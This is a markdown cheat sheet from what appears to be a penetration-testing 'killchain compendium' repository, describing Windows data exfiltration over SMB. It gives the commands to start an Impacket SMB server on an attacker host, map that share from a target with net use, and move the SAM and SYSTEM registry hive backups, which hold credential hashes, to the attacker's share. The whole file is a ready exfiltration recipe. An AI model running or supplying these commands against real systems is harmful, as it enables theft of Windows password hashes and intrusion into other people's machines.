whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/exfiltration/windows/smb_connection.md

30 lines
556 B
Markdown
Raw Blame History

# Connect to Attacker SMB
## Attacker
* Impacket smbserver on attacker
```sh
sudo examples/smbserver.py share . -smb2support -username <user> -password <password>
```
## Target
* Connect to attacker smb
```sh
net use \\<attacker-IP>\share /User:<user> <Password>
```
* Save data to attacker's smb
```sh
move sam.bak \\<attacker-IP>\share\sam.bak
move system.bak \\<attacker-IP>\share\system.bak
```
* Disconnect
```sh
net use \\<attacker-IP>\share /del
```
## Workarounds
* System Error 1312. User credentials need a domain
```sh
/USER:domain\user
```
Reference in New Issue View Git Blame Copy Permalink